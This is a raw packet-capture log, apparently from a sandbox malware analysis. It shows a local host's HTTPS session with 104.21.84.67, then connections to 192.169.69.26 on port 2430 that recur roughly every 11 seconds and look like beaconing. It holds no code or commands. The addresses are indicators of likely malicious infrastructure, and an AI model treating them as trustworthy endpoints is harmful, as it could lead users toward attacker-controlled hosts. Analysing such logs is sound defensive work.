                                                                                                          Dec 17, 2024 07:22:35.072751045 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.177692890 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.177771091 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.177798033 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.177860022 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.180708885 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.180769920 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.183624983 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.183691978 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.187194109 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.187289000 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.189071894 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.189138889 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.200361013 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.200367928 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.200412989 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.200444937 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.200464010 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.200515985 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.200537920 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.211441040 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.211453915 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.211530924 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.211544037 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.211608887 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.221128941 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.221143007 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.221225023 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.221239090 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.221302032 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.231329918 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.231345892 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.231430054 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.231451035 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.231512070 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.237692118 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.237776041 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.237788916 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.248769999 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.248821020 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.248878002 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.248894930 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.248924971 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.295727968 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.367414951 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.367479086 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.367538929 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.367573023 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.367607117 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.367647886 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.376298904 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.376346111 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.376396894 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.376410961 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.376456022 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.376478910 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.383800983 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.383843899 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.383882046 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.383897066 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.383944035 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.383963108 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.392410040 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.392455101 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.392499924 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.392513037 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.392560959 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.392582893 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.396049976 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.396156073 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.396171093 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.405194998 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.405247927 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.405282974 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.405297041 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.405343056 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.412610054 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.412656069 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.412708044 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.412720919 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.412775040 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.421040058 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.421080112 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.421144962 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.421159029 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.421205997 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.429635048 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.429676056 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.429714918 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.429727077 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.429796934 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.483218908 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.562805891 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.562833071 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.562876940 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.562913895 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.562936068 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.562972069 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.563007116 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.570796967 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.570856094 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.570880890 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.570900917 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.570940971 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.570964098 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.577598095 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.577637911 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.577696085 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.577708006 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.577755928 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.577791929 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.585618973 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.585659981 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.585721970 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.585733891 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.585779905 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.585800886 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.592983961 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.593029022 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.593081951 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.593094110 CET44349770104.21.84.67192.168.2.6
Timestamp                            Src Port  Dst Port  Source IP      Dest IP
Dec 17, 2024 07:22:35.593137980 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.593163967 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.600970984 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.601013899 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.601092100 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.601103067 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.601190090 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.608833075 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.608892918 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.608916998 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.608935118 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.608954906 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.608979940 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.609081030 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.615828037 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.615869999 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.615931988 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.615947962 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.616046906 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.754942894 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.755003929 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.755045891 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.755068064 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.755095005 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.755184889 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.762689114 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.762732983 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.762767076 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.762778997 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.762809038 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.762839079 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.769665956 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.769707918 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.769814014 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.769824982 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.769927025 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.777606010 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.777650118 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.777720928 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.777733088 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.777786016 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.777846098 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.785115957 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.785155058 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.785238981 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.785250902 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.785356998 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.787288904 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.787400961 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.787425995 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.787580967 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.788101912 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.788119078 CET  443       49770     104.21.84.67   192.168.2.6
Dec 17, 2024 07:22:35.788146973 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:35.788177013 CET  49770     443       192.168.2.6    104.21.84.67
Dec 17, 2024 07:22:36.170319080 CET  49781     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:22:36.290205956 CET  2430      49781     192.169.69.26  192.168.2.6
Dec 17, 2024 07:22:36.290313005 CET  49781     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:22:36.295800924 CET  49781     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:22:36.415575027 CET  2430      49781     192.169.69.26  192.168.2.6
Dec 17, 2024 07:22:46.846335888 CET  2430      49781     192.169.69.26  192.168.2.6
Dec 17, 2024 07:22:46.846421003 CET  49781     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:22:46.846509933 CET  49781     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:22:46.966407061 CET  2430      49781     192.169.69.26  192.168.2.6
Dec 17, 2024 07:22:47.859646082 CET  49808     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:22:47.979444981 CET  2430      49808     192.169.69.26  192.168.2.6
Dec 17, 2024 07:22:47.979588032 CET  49808     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:22:47.984169006 CET  49808     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:22:48.103974104 CET  2430      49808     192.169.69.26  192.168.2.6
Dec 17, 2024 07:22:58.332736969 CET  2430      49808     192.169.69.26  192.168.2.6
Dec 17, 2024 07:22:58.336072922 CET  49808     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:22:58.336072922 CET  49808     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:22:58.456223011 CET  2430      49808     192.169.69.26  192.168.2.6
Dec 17, 2024 07:22:59.343708992 CET  49837     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:22:59.463637114 CET  2430      49837     192.169.69.26  192.168.2.6
Dec 17, 2024 07:22:59.463723898 CET  49837     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:22:59.467046976 CET  49837     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:22:59.586787939 CET  2430      49837     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:09.838635921 CET  2430      49837     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:09.838732004 CET  49837     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:09.838810921 CET  49837     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:09.958590031 CET  2430      49837     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:10.844146013 CET  49864     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:10.963927984 CET  2430      49864     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:10.964006901 CET  49864     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:10.967617035 CET  49864     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:11.087666988 CET  2430      49864     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:21.437998056 CET  2430      49864     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:21.438169003 CET  49864     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:21.438169003 CET  49864     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:21.558068037 CET  2430      49864     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:22.454785109 CET  49893     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:22.574636936 CET  2430      49893     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:22.574728012 CET  49893     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:22.578572989 CET  49893     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:22.698386908 CET  2430      49893     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:33.104496956 CET  2430      49893     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:33.104615927 CET  49893     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:33.104684114 CET  49893     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:33.224492073 CET  2430      49893     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:34.118536949 CET  49920     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:34.238428116 CET  2430      49920     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:34.238583088 CET  49920     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:34.248363972 CET  49920     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:34.368160963 CET  2430      49920     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:44.733999968 CET  2430      49920     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:44.734225035 CET  49920     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:44.734225035 CET  49920     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:44.854085922 CET  2430      49920     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:46.093364000 CET  49948     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:46.213149071 CET  2430      49948     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:46.216229916 CET  49948     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:46.219773054 CET  49948     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:46.339819908 CET  2430      49948     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:56.594641924 CET  2430      49948     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:56.594727039 CET  49948     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:56.594820023 CET  49948     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:56.715922117 CET  2430      49948     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:57.609664917 CET  49977     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:57.729800940 CET  2430      49977     192.169.69.26  192.168.2.6
Dec 17, 2024 07:23:57.731189013 CET  49977     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:57.734522104 CET  49977     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:23:57.854485989 CET  2430      49977     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:08.295869112 CET  2430      49977     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:08.295942068 CET  49977     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:08.296010971 CET  49977     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:08.416305065 CET  2430      49977     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:09.316226959 CET  49995     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:09.438175917 CET  2430      49995     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:09.440318108 CET  49995     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:09.514792919 CET  49995     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:09.634848118 CET  2430      49995     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:19.710649014 CET  2430      49995     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:19.710724115 CET  49995     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:19.710786104 CET  49995     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:19.830518961 CET  2430      49995     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:20.719507933 CET  49996     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:20.839426041 CET  2430      49996     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:20.839529037 CET  49996     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:20.843154907 CET  49996     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:20.962997913 CET  2430      49996     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:31.234761953 CET  2430      49996     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:31.236429930 CET  49996     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:31.236490011 CET  49996     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:31.356398106 CET  2430      49996     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:32.250298977 CET  49997     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:32.370372057 CET  2430      49997     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:32.370615005 CET  49997     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:32.374676943 CET  49997     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:32.494487047 CET  2430      49997     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:42.848412037 CET  2430      49997     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:42.850727081 CET  49997     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:42.850727081 CET  49997     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:42.970622063 CET  2430      49997     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:43.868483067 CET  49998     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:43.988344908 CET  2430      49998     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:43.988522053 CET  49998     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:43.992369890 CET  49998     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:44.112276077 CET  2430      49998     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:54.399898052 CET  2430      49998     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:54.404510021 CET  49998     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:54.407455921 CET  49998     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:54.527132988 CET  2430      49998     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:55.744164944 CET  49999     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:55.863951921 CET  2430      49999     192.169.69.26  192.168.2.6
Dec 17, 2024 07:24:55.864063025 CET  49999     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:55.867364883 CET  49999     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:24:55.987055063 CET  2430      49999     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:06.333511114 CET  2430      49999     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:06.336610079 CET  49999     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:06.336610079 CET  49999     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:06.456408978 CET  2430      49999     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:07.344381094 CET  50000     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:07.464150906 CET  2430      50000     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:07.464261055 CET  50000     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:07.467294931 CET  50000     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:07.587074995 CET  2430      50000     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:17.732012987 CET  2430      50000     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:17.732093096 CET  50000     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:17.732263088 CET  50000     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:17.851958990 CET  2430      50000     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:18.735387087 CET  50001     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:18.855190039 CET  2430      50001     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:18.856645107 CET  50001     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:18.860223055 CET  50001     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:18.980011940 CET  2430      50001     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:29.396924019 CET  2430      50001     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:29.400872946 CET  50001     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:29.400872946 CET  50001     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:29.520561934 CET  2430      50001     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:30.422470093 CET  50003     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:30.542216063 CET  2430      50003     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:30.542373896 CET  50003     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:30.545703888 CET  50003     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:30.665335894 CET  2430      50003     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:40.898407936 CET  2430      50003     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:40.898648024 CET  50003     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:40.898648024 CET  50003     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:41.018698931 CET  2430      50003     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:41.906831026 CET  50004     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:42.026823997 CET  2430      50004     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:42.028697968 CET  50004     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:42.032382965 CET  50004     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:42.152203083 CET  2430      50004     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:52.532102108 CET  2430      50004     192.169.69.26  192.168.2.6
Dec 17, 2024 07:25:52.532171965 CET  50004     2430      192.168.2.6    192.169.69.26
Dec 17, 2024 07:25:52.532258987 CET  50004     2430      192.168.2.6    192.169.69.26
